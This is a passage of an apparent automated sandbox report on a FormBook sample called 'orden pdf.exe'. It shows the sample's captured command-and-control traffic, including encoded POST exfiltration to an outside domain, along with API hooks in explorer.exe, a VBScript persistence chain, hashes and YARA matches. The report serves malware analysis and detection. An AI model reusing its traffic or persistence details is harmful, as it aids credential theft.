                                            Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=bepbosch&amp;e=com">here</a>.</h2></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34976291.195.240.9480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:14:14.503000975 CET9815OUTGET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1
                                            Host: www.hydrabadproperties.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:14:14.557537079 CET9816INHTTP/1.1 301 Moved Permanently
                                            content-type: text/html; charset=utf-8
                                            location: https://www.hydrabadproperties.com/n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR
                                            date: Wed, 13 Jan 2021 20:14:14 GMT
                                            content-length: 171
                                            connection: close
                                            Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 79 64 72 61 62 61 64 70 72 6f 70 65 72 74 69 65 73 2e 63 6f 6d 2f 6e 37 61 6b 2f 3f 72 4e 3d 41 6b 41 34 61 79 63 45 7a 64 63 4d 62 67 71 47 33 53 6e 4c 73 76 6e 61 30 6a 61 52 44 65 77 6d 59 69 63 63 71 72 53 37 79 30 51 58 7a 6f 75 44 51 2b 61 2f 44 71 6c 55 56 49 4d 41 6a 50 76 61 64 65 6c 55 26 61 6d 70 3b 51 5a 33 3d 64 68 72 78 50 70 63 58 4f 30 54 4c 48 56 52 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                            Data Ascii: <a href="https://www.hydrabadproperties.com/n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&amp;QZ3=dhrxPpcXO0TLHVR">Moved Permanently</a>.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.34976391.195.240.9480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:14:16.616647005 CET9817OUTPOST /n7ak/ HTTP/1.1
                                            Host: www.hydrabadproperties.com
                                            Connection: close
                                            Content-Length: 408
                                            Cache-Control: no-cache
                                            Origin: http://www.hydrabadproperties.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.hydrabadproperties.com/n7ak/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Data Raw: 72 4e 3d 49 47 4d 43 45 55 34 57 78 4b 30 47 47 67 58 33 33 55 65 77 34 4a 76 30 6a 51 65 59 49 4b 6b 66 4a 53 46 4a 78 4a 7a 6b 31 6b 38 38 79 4d 79 38 65 64 48 46 4d 76 59 50 43 4c 52 31 6f 38 66 59 53 2d 6b 74 6c 6b 69 59 64 49 42 65 65 33 4b 76 6a 63 69 4d 78 66 58 31 43 4a 6e 41 5a 52 66 5a 4a 72 51 5a 4e 45 78 4a 6e 72 30 37 4f 7a 66 43 54 30 58 69 53 39 5a 77 4d 59 6c 76 75 68 38 43 42 4a 30 41 72 37 6b 61 51 4b 68 6f 36 75 28 77 62 6b 72 41 28 69 38 54 71 57 7a 43 34 34 38 46 4e 6c 44 58 47 66 69 2d 6e 72 62 48 4a 44 38 6e 61 39 48 30 6e 45 4d 66 6f 66 34 64 7e 44 7a 63 37 47 52 54 57 76 34 32 4e 79 59 4f 4e 30 57 59 6e 37 6c 6f 4e 36 70 77 66 6f 52 48 68 55 44 41 4d 35 34 44 4a 4e 56 6a 4e 37 7e 6a 4c 64 5a 65 32 39 75 52 57 6f 6a 67 79 36 6b 31 46 6a 73 50 79 61 49 61 64 65 65 72 49 43 6b 4a 76 6c 69 59 6b 75 76 44 38 6d 67 65 65 71 67 57 4f 30 41 36 61 54 4b 6e 35 65 76 50 28 34 38 44 65 48 64 61 4c 47 49 6e 41 4f 50 6b 50 64 6f 76 38 50 30 68 4b 74 74 36 32 6c 69 62 4c 42 57 66 37 53 42 58 70 56 6d 62 69 66 6a 43 4d 77 51 5a 4d 32 59 51 77 72 51 74 41 56 45 73 39 50 39 65 4d 4b 4f 5f 63 5f 4e 37 42 61 46 50 6e 4e 56 4a 4c 6c 79 37 48 70 6f 30 47 34 4c 70 69 38 71 6b 49 77 4e 71 71 77 29 2e 00 00 00 00 00 00 00 00
                                            Data Ascii: rN=IGMCEU4WxK0GGgX33Uew4Jv0jQeYIKkfJSFJxJzk1k88yMy8edHFMvYPCLR1o8fYS-ktlkiYdIBee3KvjciMxfX1CJnAZRfZJrQZNExJnr07OzfCT0XiS9ZwMYlvuh8CBJ0Ar7kaQKho6u(wbkrA(i8TqWzC448FNlDXGfi-nrbHJD8na9H0nEMfof4d~Dzc7GRTWv42NyYON0WYn7loN6pwfoRHhUDAM54DJNVjN7~jLdZe29uRWojgy6k1FjsPyaIadeerICkJvliYkuvD8mgeeqgWO0A6aTKn5evP(48DeHdaLGInAOPkPdov8P0hKtt62libLBWf7SBXpVmbifjCMwQZM2YQwrQtAVEs9P9eMKO_c_N7BaFPnNVJLly7Hpo0G4Lpi8qkIwNqqw).
                                            Jan 13, 2021 21:14:16.678611040 CET9831INHTTP/1.1 301 Moved Permanently
                                            location: https://www.hydrabadproperties.com/n7ak/
                                            date: Wed, 13 Jan 2021 20:14:16 GMT
                                            content-length: 0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.34976491.195.240.9480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:14:16.666001081 CET9831OUTPOST /n7ak/ HTTP/1.1
                                            Host: www.hydrabadproperties.com
                                            Connection: close
                                            Content-Length: 194340
                                            Cache-Control: no-cache
                                            Origin: http://www.hydrabadproperties.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.hydrabadproperties.com/n7ak/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Data Raw: 72 4e 3d 49 47 4d 43 45 56 77 73 7a 38 6f 54 43 53 44 36 6c 33 6d 47 7a 71 48 71 79 68 28 47 42 39 4a 73 4a 46 56 6a 78 49 43 74 39 46 73 75 68 38 69 38 59 66 76 38 41 76 59 51 4a 72 52 30 73 38 54 73 62 4e 55 6c 6c 6e 76 31 64 49 35 5a 51 56 53 6d 74 73 69 68 33 5f 62 5a 45 4a 44 62 5a 58 66 38 4a 4a 38 42 49 45 39 4a 71 5f 59 35 54 69 76 5a 51 31 62 54 4d 39 46 6f 4f 61 6c 32 75 52 52 39 42 72 49 69 73 36 34 50 48 4d 70 5a 31 4f 4f 76 4b 44 58 46 7a 53 6f 59 76 52 6a 52 32 37 5a 4d 41 45 44 6c 44 65 69 35 6c 62 43 45 4d 44 74 61 51 70 32 4b 6d 55 51 4c 6f 63 59 6a 35 31 54 33 28 48 42 74 55 65 31 64 5a 32 41 4d 43 6e 28 62 77 70 4d 65 50 37 35 50 58 4c 46 69 6c 46 76 77 41 63 6c 65 4e 63 4e 78 43 70 61 76 53 34 6c 71 31 73 71 4a 61 49 7a 50 6f 4c 74 39 4c 51 6c 43 31 59 45 33 43 75 65 49 4f 43 6b 46 67 46 79 4f 68 5a 28 49 37 56 49 38 59 61 59 50 4c 6b 73 47 57 77 28 6b 33 64 32 35 34 4d 4a 52 56 55 56 49 4a 67 6f 75 42 65 37 50 4a 64 6f 31 76 64 73 6f 4b 74 74 2d 32 67 50 4d 4d 67 43 66 37 43 67 54 70 79 37 61 6b 66 69 59 4f 6b 30 62 61 55 4d 41 77 74 34 74 42 6b 30 47 73 75 35 65 4a 5a 6d 34 66 64 6c 37 4d 4b 46 50 72 74 55 6e 59 31 61 7a 4c 4c 6f 30 44 4a 79 52 68 61 62 77 64 53 56 76 39 5a 4e 5a 6f 5f 32 76 77 33 78 4e 4b 50 7a 55 4c 6e 39 49 6b 4a 42 6c 4a 70 55 68 72 53 66 4f 72 6f 6b 43 67 32 73 6e 64 77 6b 73 6b 74 4b 6f 45 70 38 54 7e 6a 4a 7a 61 6a 34 44 56 41 33 69 37 62 36 48 65 72 48 33 71 34 61 4e 41 5f 51 37 31 36 64 43 6e 69 47 6c 30 57 6f 47 32 49 57 35 36 47 42 55 45 53 70 35 30 65 62 55 62 56 41 63 42 44 46 37 31 74 53 4a 34 62 51 4f 66 6a 52 61 4a 77 71 71 68 4e 4d 4e 38 58 78 59 6b 77 6b 41 56 64 67 51 43 79 65 6b 4a 5f 39 38 6a 66 7e 2d 69 54 65 51 55 62 72 65 42 55 61 4d 7e 2d 32 52 30 62 68 36 74 4c 58 48 52 4d 48 4c 52 71 36 57 45 6e 39 58 46 49 30 62 61 52 6e 50 6e 4e 44 36 7a 52 30 67 50 6d 73 57 33 54 63 4d 47 6d 46 7a 43 68 59 6e 78 73 79 58 78 67 74 52 7a 53 52 79 71 6e 53 65 32 44 72 4e 63 72 47 48 46 33 28 34 65 30 79 5f 73 76 6c 54 75 46 61 76 36 4c 72 53 28 38 73 4f 28 4c 52 6b 4b 47 49 57 66 4f 6d 6a 46 49 74 32 47 6d 64 79 77 53 36 5f 76 33 77 43 51 41 79 71 59 44 35 4d 61 77 41 49 6a 44 51 61 47 48 78 58 57 4b 59 4e 73 57 55 66 73 63 4c 4c 75 52 30 59 4d 66 68 4e 70 47 4e 73 37 72 46 45 44 48 58 75 7e 61 47 46 59 35 51 65 74 4b 31 4e 4d 44 34 6d 6b 73 37 48 4c 6a 4e 6f 65 69 39 73 28 57 4a 5a 58 67 56 4b 32 4d 61 63 79 70 35 53 64 43 36 4c 4b 30 49 51 35 6f 6f 42 71 46 59 78 4e 54 30 71 52 36 4c 39 37 37 62 62 6f 6e 58 6f 50 4e 43 30 69 38 45 53 36 48 75 50 53 58 4f 41 59 4f 72 6c 53 42 71 53 41 4f 42 4a 46 36 28 51 44 35 46 6f 50 4c 47 4c 54 7a 31 4a 78 61 69 69 4f 63 43 47 68 4b 35 4c 63 73 37 61 43 56 42 4c 66 78 74 51 36 47 6d 79 6d 67 57 4e 78 61 41 39 68 54 55 4f 78 6b 53 48 78 33 4a 6a 49 7a 33 4a 44 32 48 67 48 72 6c 63 6e 31 61 5a 45 72 58 59 38 7a 6f 75 75 36 73 4e 4f 59 45 7a 46 36 32 6c 56 33 7e 34 31 75 41 4b 72 74 32 72 6e 49 5a 35 62 51 64 38 76 42 32 76 36 59 77 48 73 2d 68 4f 44 2d 70 4c 4b 42 7e 54 71 65 59 6b 50 64 30 31 45 48 57 49 38 62 45 45 4c 69 58 56 51 4e 6d 77 65 79 50 4d 28 69 36 70 4e 54 52 59 79 6a 63 38 42 69 35 35 4d 59 77 58 47 5f 36 41 49 65 55 4f 4b 53 4a 6d 55 46 42 65 78 4f 51 62 46 49 49 4f 6d 54 6d 42 73 4e 57 6e 58 67 6a 72 78 73 34 41 4f 37 6c 63 46 58 44 4a 59 6e 55 4b 62 59 77 48 69 42 4e 2d 4d 71 49 36 57 53 44 6b 6e 6a 30 52 57 63 56 54 6c 43 41 33 72 54 7a 4b 64 41 7a 79 4b 64 50 52 36 77 53 6a 50 4f 74 4b 28 42 71 6e 6d 34 53 47 49 72 57 46 65 37 32 73 44 67 28 61 63 54 49 48 6c 4e 71 30 41 5f 75 6a 42 63 46 68 73 4d 77 50 74 37 79 64 6e 64 44 6d 49 56 45 56 30 72 33 7a 30 53 42 6a 72 55 49 38 58 76 5a 77 79 31 63 70 34 62 73 6f 35 6b 49 6f 71 53 76 78 71 54 37 4f 34 38 57 49 5a 47 71 74 42 79 39 2d 48 4e 7e 6f 58 70 70 63 34 68 49 4b 53 63 7a 44 6e 64 71 72 46 74 75 51 47 42 37 58 42 47 45 2d 35 6e 6b 5f 58 57 31 2d 6c 79 79 72 6b 32 42 51 56 30 79 61 4a 72 66 6e 57 5a 73 4e 4b 34 64 56 68 64 79 63 57 5a 6e 66 55 54 73 78 62 71 4d 76 6e 6d 57 5f 59 6d 54 71 37 70 43 50 71 48 31 34 51 54 7e 6a 4b 4c 4f 67 74 77 48 6a 55 4c 70 67
                                            Data Ascii: rN=IGMCEVwsz8oTCSD6l3mGzqHqyh(GB9JsJFVjxICt9Fsuh8i8Yfv8AvYQJrR0s8TsbNUllnv1dI5ZQVSmtsih3_bZEJDbZXf8JJ8BIE9Jq_Y5TivZQ1bTM9FoOal2uRR9BrIis64PHMpZ1OOvKDXFzSoYvRjR27ZMAEDlDei5lbCEMDtaQp2KmUQLocYj51T3(HBtUe1dZ2AMCn(bwpMeP75PXLFilFvwAcleNcNxCpavS4lq1sqJaIzPoLt9LQlC1YE3CueIOCkFgFyOhZ(I7VI8YaYPLksGWw(k3d254MJRVUVIJgouBe7PJdo1vdsoKtt-2gPMMgCf7CgTpy7akfiYOk0baUMAwt4tBk0Gsu5eJZm4fdl7MKFPrtUnY1azLLo0DJyRhabwdSVv9ZNZo_2vw3xNKPzULn9IkJBlJpUhrSfOrokCg2sndwksktKoEp8T~jJzaj4DVA3i7b6HerH3q4aNA_Q716dCniGl0WoG2IW56GBUESp50ebUbVAcBDF71tSJ4bQOfjRaJwqqhNMN8XxYkwkAVdgQCyekJ_98jf~-iTeQUbreBUaM~-2R0bh6tLXHRMHLRq6WEn9XFI0baRnPnND6zR0gPmsW3TcMGmFzChYnxsyXxgtRzSRyqnSe2DrNcrGHF3(4e0y_svlTuFav6LrS(8sO(LRkKGIWfOmjFIt2GmdywS6_v3wCQAyqYD5MawAIjDQaGHxXWKYNsWUfscLLuR0YMfhNpGNs7rFEDHXu~aGFY5QetK1NMD4mks7HLjNoei9s(WJZXgVK2Macyp5SdC6LK0IQ5ooBqFYxNT0qR6L977bbonXoPNC0i8ES6HuPSXOAYOrlSBqSAOBJF6(QD5FoPLGLTz1JxaiiOcCGhK5Lcs7aCVBLfxtQ6GmymgWNxaA9hTUOxkSHx3JjIz3JD2HgHrlcn1aZErXY8zouu6sNOYEzF62lV3~41uAKrt2rnIZ5bQd8vB2v6YwHs-hOD-pLKB~TqeYkPd01EHWI8bEELiXVQNmweyPM(i6pNTRYyjc8Bi55MYwXG_6AIeUOKSJmUFBexOQbFIIOmTmBsNWnXgjrxs4AO7lcFXDJYnUKbYwHiBN-MqI6WSDknj0RWcVTlCA3rTzKdAzyKdPR6wSjPOtK(Bqnm4SGIrWFe72sDg(acTIHlNq0A_ujBcFhsMwPt7ydndDmIVEV0r3z0SBjrUI8XvZwy1cp4bso5kIoqSvxqT7O48WIZGqtBy9-HN~oXppc4hIKSczDndqrFtuQGB7XBGE-5nk_XW1-lyyrk2BQV0yaJrfnWZsNK4dVhdycWZnfUTsxbqMvnmW_YmTq7pCPqH14QT~jKLOgtwHjULpg3WWTG-0n9mbcLupU8GeKjUDi~oqpW3o3NtJXuu3XD0zLKY71MzNHHZxbmLREYIhpMVE6Sk3j1TEpZfnnHo0uFF1sl_~5t7OKJ8tTN-vySfUULWcuAnnjKQN38BQe0mH62U8vQ5FKwcQZcazbWjcdqZ3kXZj6NpKSeGH9wsWw3cZ0bLDheWmeNocuPgXAhLtzEz(jYo7uTd8Ql5EuvBg10qVrZRGRUQ2sGegb4p3d9tWXeDrmOXU52aIvmCA1I71wALEVuQ6y9tKXTNfNdj7g6O7WUFFQ8NPcf-c5fJNiXLHjoD3Wf29nnLJfuoggm6IpqPe0s0GcMTlGPt5t(2etesdkTfyIx1gDDOG0dGS3QTSE9FxMy6tFPgSTP-brcPDNfvRPHXKFFN0T5m3Z0W4WYlahut1kiAWhPlhaBF(Qzpbs8F4z(dSNhKU1NToKrupMw0PoduMezxbVlzwIgPtTjy(p6LFMPbcdcvM5rcN5qUsdaov4RMjbZh5Z(yw-AHx77rfeHG02tlgyUvWj9Vz-hkGnvzPvChBhcoidTpVyYu4qYT13pQIBzkhQIxBGBMgKBovS3daC2iGDO9kD6QDQbx1-hsorbf8T9mgD55b4wFDKBBJOTv5p4BZwSjrNKevduEleColX0RxWSx4m9gXMB-~uOCdtvtcLVLdk8eQiBkF0O5PROyGNsTAdjxgcBv1vQDBihgsfcEkkHCifZUlnoxzM78zNxlhVE2o_JzvAQM~5~cePowKQkHzB(uLy67MnUbppPaHSSulY1scPwN6SdVLszZr0zJg-8DcAr3ljAEuIWcuOOtXJIASOaQxWCp~cf-dxA4WiR_00WKz2m3Hx2rLjFSdOHx6cQ-(AyCWLNBLXlHz2fpB-hiWKFErcjhc1Zh(zen92SHRxtPOCtH5O2oekI3i5LB7YY3KcC7W7CM5vPKpj042fEYU4QusMLZgeyWEMQgnDbAlIZApC6tkX3r37BHg8FAB_dzKKT8oxSbzxQhP9owUKdiuN~I4QPipU(Iyhib0Gb9qUGum-wDzb1fE2zlP6EF7cLlyXOg9M~eXJo6WyoaTIYjW8osV2BbMd(a9hjrw7RUgh8LCIXZJYHJz6dhViOrFwKGaefR9nUyrYIcOniUs0p09Jr_GGeo9NKDt44_(-O3sFU4dVwYGAQtz3tWcZoCE7soBJBAz0symJPJlbhcaCbJN0ciBfBUpBvcqeebN6N3J_JmuLPJmKwodIep738JqnDP0Jq_~LlwoSwwtrj0(-WjzrZmwLLoZl2Gj2kOWbOVaevhWbabM5owXKioFsvFdyOvr1eYIemS7fSoZ8TW1nCMeTYleBhCprbEdwfAvzU5l7kXLklV5SVx9PDX3qLsVCrKqDztc3qm68HL8Oj_l_bWm4TDg4(pVYtLHKqkUPZoFoeJOViG10R64aBykwuuZzINduJmOPev9rMaMlNmhTK6Sswqpetw3USc0MF6ObWxnUFbPcUiXSY6Q6rLuGlGiI2ZMiF-hIUWj8JWFfMBEEYXVGfAKAf-7ke5na~qgike3hk2KCdWMsKShcAfALUvDEBkFY8EhDOGw2BIR4CfTrSlM2GEZFh3gVkMvIKFuGG_tdT42yb7wgxRFbExjkL-9UrZAJN_J-UgbWojIBwZHYf4Q9DtDf(Lf1JFcPSWWz4A3uW6V-h1zBknFrpEcl4bJq7QWuC-CaTNffeQJmQughmlFQ2mTj8eEDIWCaaGuNHygco7Sy6l0YW7bi~cEamb~xOQFXuOJ_Byjpu0R2ebjiq23cPQr4fsTXzAJ5QhpSZKJTZcUQGhEbfpnMxST85Zo6QjY8zi35P_RyaTT2JAFh8SPVPsKHqSUW5gAeexP8m8G2lAhsRPNhEZVfJ1WlgLC_VUH18RqpviV8s-6sKXrOuN7SrFvdz7K9zYqd4FHv9rFlbhzWPQisBHD7(ZtK63NpBL4ee_Bi1kUf~Nvw1U1Nwyr49oFFLP9qALAThVfhBC~aNtBS4opn39u8RjICrELS6Oq_7r0QiEqpfxp3QvK5aoW8HmccJhxxe7lIB3MDtIUmEkrF8rwscK4VTatWr0krK6i5Jse8uHsQ5qWBvVlzDauoQU0krugprufYGpvVJnkNccaljwg4nYcasXqtgU(42g3JOgUR1C4TbDofq6UybisONpTXIhPxhhU-likdWi9eJSspNe3gcvZdSUzPu4xZk6AB4EJC09ejEbDzI8EMuW~4Gpfk0DelKkF6YQE0XMLEoYajX13nfCCrGxr_82eNDXdSRO4RTTjl(cbY(7F9AzWiO2ApNOikcqTlRFOE7yQrQcP5NszyjxeOaFru~7ceEZnc3Hu-giq_J94sJdIlj02dUIxJ~Vwj5jy3xquS6j4EJq4BryQ0wn1QudEIg-T7(XAeTVE2qsVjYDo_YuUVtEBLRGoDcnj0w6OByNxTIDVGsPr0FzmGuIBS5gwZZuinDP9boTB3iC1L1BBk95zq7Rg_T2rW6YtLMe86pxi66YNT~UCpGaOJEMIZf7ukh197(9offDis~hlaztqY7pD-7ld588ZuL6aqNvebtCcccFder9ZRfFSMt-VPBxSI1yXQjQ~OuGL3nFL9I5~eKhaqCxy2rtciaDnqYFBtwiizCRGShEl5XcGLmwrpBlyh(uI8M-Qs(53VJHErWowzYounEjVTgcz_vKSF0TdStgIwuvEoACZFxCvbtRoo~-~I0WONT3b
                                            Jan 13, 2021 21:14:16.894265890 CET10018INHTTP/1.1 301 Moved Permanently
                                            location: https://www.hydrabadproperties.com/n7ak/
                                            date: Wed, 13 Jan 2021 20:14:16 GMT
                                            content-length: 0
                                            connection: close


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x93 0x37
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x13 0x37
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x13 0x37
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x93 0x37

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: orden pdf.exe PID: 2224 Parent PID: 5824

                                            General

                                            Start time:21:11:16
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\orden pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\orden pdf.exe'
                                            Imagebase:0x170000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Analysis Process: orden pdf.exe PID: 4700 Parent PID: 2224

                                            General

                                            Start time:21:11:26
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\orden pdf.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\Desktop\orden pdf.exe
                                            Imagebase:0x170000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low

                                            Analysis Process: orden pdf.exe PID: 5476 Parent PID: 2224

                                            General

                                            Start time:21:11:26
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\orden pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\orden pdf.exe
                                            Imagebase:0x7ff6741d0000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Analysis Process: explorer.exe PID: 3388 Parent PID: 5476

                                            General

                                            Start time:21:11:29
                                            Start date:13/01/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff714890000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: wscript.exe PID: 4120 Parent PID: 3388

                                            General

                                            Start time:21:11:30
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
                                            Imagebase:0x7ff67eb10000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: DeviceCensus.exe.exe PID: 5652 Parent PID: 4120

                                            General

                                            Start time:21:11:34
                                            Start date:13/01/2021
                                            Path:C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
                                            Imagebase:0x1370000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
